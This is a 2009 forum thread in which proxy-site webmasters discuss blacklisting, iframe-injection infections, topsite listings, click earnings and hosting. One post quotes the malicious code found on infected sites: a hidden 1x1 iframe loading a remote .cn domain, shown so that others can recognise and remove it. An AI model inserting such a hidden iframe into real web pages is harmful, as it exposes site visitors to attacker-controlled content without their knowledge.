1. Advertising
    y u no do it?

Advertising (learn more)

Advertise virtually anything here, with CPM banner ads, CPM email ads and CPC contextual links. You can target relevant areas of the site and show ads based on geographical location of the user if you wish.

Starts at just $1 per CPM or $0.10 per CPC.

The Proxy Discussion Thread

Discussion in 'General Business' started by antman, Jul 14, 2007.

1. proxified

proxified Well-Known Member

Best Answers:
    you can submit only one at a time and rest of the amount in your coupon will be retained for usage for the next time.

i have already disabled all free email sites for that cause as my server ip was banned earlier because of spamming but this time phishing report has been done because of hotlinking was disabled :eek:

proxified, Apr 29, 2009 IP
    JacobNix likes this.
  2. tradeya

tradeya Notable Member

Best Answers:
    it happened to my sites too. I got 3 sites was blocked by firefox and google.
    probably your sites and whole whole servers were attacked and were injecting "iframe" code on all the index.*** files. please check the whole site and server and delete that "iframe" code line. then you should be fine after a week.

tradeya, Apr 30, 2009 IP
    proxified likes this.
  3. proxified

Best Answers:

iframe attack happened a week back and it din't affec the proxies but other sites which had contact/comment forms in them. iframes cannot be injected into proxies. it happened because i disabled hotlinking protection and some might have sent phishing pages by hotlinking them

anyways i got 1 of the 2 sites unblocked from google now for that phishing thing. hope the other one is unblocked too soon. :)

proxified, Apr 30, 2009 IP
  4. tradeya

tradeya Notable Member

Best Answers:
    so I might be the only unlucky person that all my proxy sites got attacked by iframe injection then. what a luck lol XD

tradeya, Apr 30, 2009 IP
  5. chandan123

chandan123 Prominent Member

Best Answers:
    whats that iframe code :confused: ?

how they injected that code ? any file permission abuse ?
    its good news

chandan123, Apr 30, 2009 IP
  6. proxified

Best Answers:
    you must be having some other site in your same account which would have got a contact/comment form where a user can add their input.

here are some of the articles i found while searching google about that iframe injection. even 3-4 sites of mine were affected with that injection.

http://eisabainyo.net/weblog/2009/04/06/iframe-injection-attack/

http://modxcms.com/forums/index.php?topic=34918.0

http://www.coldfusionmuse.com/index.cfm/2009/4/23/Iframe.VBscript

http://blog.unmaskparasites.com/2009/04/15/malicious-income-iframes-from-cn-domains/

the iframe code will be like this

<iframe src="http: //lotmachinesguide .cn/ in.cgi?income56" width=1 height=1 style="visibility: hidden"></iframe>
    HTML:

if you have any scripts with contact/comment form just upgrade them to their latest version. if you are using wordpress then just check with the authors of the plugins if those plugins might be causing any vulnerability which allows that iframe injection. so even if you have the strongest cms, doesnt neccessarily means that you are 100% secured of that injection

7. SSANZ

SSANZ Peon

Best Answers:
    We have had a lot of people coming in for site infections lately, 90% of them are iframe injections via an insecure script, plugin or CMS.

Always, keep your scripts up to date...

SSANZ, Apr 30, 2009 IP
  8. Review

Review Peon

Best Answers:
    I, quite a while ago, flipped a couple of proxy browser and the traffic was fairly easy to obtain. I was wondering, what's the market like these days for proxy browsers? I noticed at my college, the school security has tightened dramatically and there's almost no established proxy browsers you can get on. Has this effected traffic much? Are people eventually giving up on proxy browsers?

I've recently restarted my previously established proxy browser topsite that was destroyed by frequent bot submissions. It's pagerank 2 now with some good SEO traffic coming in. I'm welcoming all submissions - http://www.bypassdaily.com

Review, Apr 30, 2009 IP
  9. Guthix121

Guthix121 Well-Known Member

Best Answers:
    Proxies are still doing great. Actually, I've seen quite a few 30 cent clicks on my proxy today.

Guthix121, Apr 30, 2009 IP
  10. Korrupt

Korrupt Well-Known Member

Best Answers:
    submitted, you forgot to add the categories though xD

I got a $2 click yest. and $4 a few days back. today I made $1.30 from 3 clicks from one of my new proxies which i started promoting yest.

Korrupt, Apr 30, 2009 IP
  11. coox132

coox132 Banned

Best Answers:
    Hello,

I have just started a PHP Proxy site with a simple design for now with no adsense or anything its a clean simple template made to run easily on many computers.

BypassMyProxy.com

Is there any security measures I should be taking to prevent anything bad happening to my site I have enabled Hot Link Protection as I read that that helps for something but is there anything else I need to take care of to keep full protection?

Thanks,
    John

coox132, Apr 30, 2009 IP
  12. proxified

Best Answers:
    as reported there were over 200,000 sites infected with that iframe injection

i had a wordpress blog too which was infected which din't had much plugins and all plugins and the wordpress cms were up-to-date. the security hole was there in a plugin itself. and there was no other site on that account apart from that wordpress blog

13. Review

Review Peon

Best Answers:
    Thanks, I completely wiped the database and forgot the categories - easy mistake! The domain itself was PR4 a while back and I'm hoping with a re-promotion we'll regain that and hopefully pick up on the traffic we used to receive.

Great to hear that the clicks are still pulling out the stops.

Review, Apr 30, 2009 IP
  14. Dollar

Dollar Active Member

Best Answers:
    Just so you know. The overwhelming consensus from what I read in this thread is that proxy webmaster dislike submitting to sites using the Aardvark Topsite script. There are better alternatives now. So for your topsite bypassdaily you may want to look around for something better.

Dollar, Apr 30, 2009 IP
  15. SOULZRIPPER

SOULZRIPPER Well-Known Member

Best Answers:
    I used http://www.proxypromo.com/

on my topsite http://Proxys.in

Cheap and best.. And the script developer is friendly !!

It comes with a nice admin panel and whole range of themes.

Cos when I was googling for such scripts I saw others were selling the same type of scripts for like 200$ lol !!

SOULZRIPPER, May 1, 2009 IP
  16. sidharthvijayan

sidharthvijayan Peon

Best Answers:
    Where do you guys host you proxy websites?

sidharthvijayan, May 1, 2009 IP
  17. LordByron

LordByron Active Member

Best Answers:
    Try my site at:

Ninja-Blue.com

It is a PR3 and no backlink is required. All proxies submitted go out to over 2000 hungry proxy users and the best proxies... as voted for by users... will be sent out to a premium list. Even better, the site is revenue share (like DP) so the more proxies you submit the more you earn.

LordByron, May 1, 2009 IP
  18. Review

Review Peon

Best Answers:
    I do hear your opinion and I agree there may be better ways to structure these sites now with the readily available commercial scripts out there but I feel sticking with our current format is best suited for our current situation. It worked great for us last time, and I'm hoping the same will come about this time with the right marketing.

We may switch at a later date to a listing script, but for now we'll remain as a topsite. Thanks for your advice, the URL http://www.proxypromo.com/ is also looking very good, I've noted the URL for if we decide to make the switch. But right now, a PR 2 link on a reset site receiving traffic is a golden opportunity.

Review, May 1, 2009 IP
  19. sidharthvijayan

sidharthvijayan Peon

Best Answers:
    Come on guys! Where do you host your proxy websites!

sidharthvijayan, May 1, 2009 IP
  20. beastmoon

beastmoon Active Member

Best Answers:
    I host at tmzhosting and also have VPS at wdservers, just for combination only

beastmoon, May 1, 2009 IP